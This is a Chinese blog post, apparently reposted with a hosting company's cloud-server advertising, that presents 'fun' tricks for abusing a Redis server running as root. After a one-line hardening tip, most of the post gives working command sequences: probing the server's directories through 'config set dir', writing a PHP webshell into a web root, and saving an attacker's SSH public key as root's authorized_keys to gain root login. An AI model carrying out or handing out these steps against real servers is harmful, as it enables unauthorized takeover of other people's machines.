關(guān)于Redis的一些好玩東西-創(chuàng)新互聯(lián)

在許多服務(wù)器上部署的Redis是采用Root權(quán)限進(jìn)行啟動(dòng)進(jìn)而可以利用這個(gè)Root做許多超級(jí)權(quán)限的事情。由于REDIS是沒(méi)有嚴(yán)格授權(quán)管理機(jī)制大家在部署一定不要設(shè)置為0.0.0.0以及最好使用requirepass(雖然是明文但是至少增加一定的難度)。

創(chuàng)新互聯(lián)公司專(zhuān)注于竹山企業(yè)網(wǎng)站建設(shè),成都響應(yīng)式網(wǎng)站建設(shè),商城網(wǎng)站制作。竹山網(wǎng)站建設(shè)公司,為竹山等地區(qū)提供建站服務(wù)。全流程按需網(wǎng)站開(kāi)發(fā)，專(zhuān)業(yè)設(shè)計(jì)，全程項(xiàng)目跟蹤，創(chuàng)新互聯(lián)公司專(zhuān)業(yè)和態(tài)度為您提供的服務(wù)

本文主要利用的是redis提供的configsave兩個(gè)命令來(lái)完成我們的HACK功能便捷的工具用歪了就成了禍害。

簡(jiǎn)單介紹幾個(gè)有用的命令

config set dir $path:

這個(gè)命令是配置為了指定redis的“工作路徑”之后生成的RDB和AOF文件都會(huì)存儲(chǔ)在這里

dbfilename $name:

RDB文件名默認(rèn)為“dump.rdb”

save:

將內(nèi)存里的數(shù)據(jù)進(jìn)行持久化操作

它們結(jié)合在一起就可以實(shí)現(xiàn)如下好玩的功能

1.指定文件夾是否存在

config set dir /home/bob

如果是返回(error) ERR Changing directory: No such file or directory表示沒(méi)有該文件夾。

如果返回OK表示服務(wù)器上有這個(gè)文件夾并且已經(jīng)將其設(shè)置為內(nèi)存快照保存的文件夾

2.webshell最好使用之前進(jìn)行flushdb,或者flushall清空內(nèi)存里數(shù)據(jù)

1.config set dir /opt/web/www #設(shè)定網(wǎng)站的目錄
2.config set dbfilename test.php #設(shè)定將要保存的文件名
3.set "" "" #我們的webshell
4.save  #將內(nèi)存持久化到test.php

3.訪(fǎng)問(wèn)信任

1.cat ~/.ssh/id_rsa.pub > ~/foo.txt
2.cat ~/foo.txt|redis -x set hack #將foo.txt里的內(nèi)容保存為一個(gè)KEY為hack的字符串
3.config set dir /root/.ssh/ #設(shè)定root的.ssh文件夾
4.config set dbfilename authorized_keys
5.save

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務(wù)器15元起步，三天無(wú)理由+7*72小時(shí)售后在線(xiàn)，公司持有idc許可證，提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性?xún)r(jià)比高”等特點(diǎn)與優(yōu)勢(shì)，專(zhuān)為企業(yè)上云打造定制，能夠滿(mǎn)足用戶(hù)豐富、多元化的應(yīng)用場(chǎng)景需求。

文章標(biāo)題：關(guān)于Redis的一些好玩東西-創(chuàng)新互聯(lián)
分享URL：http://m.jiaotiyi.com/article/jeope.html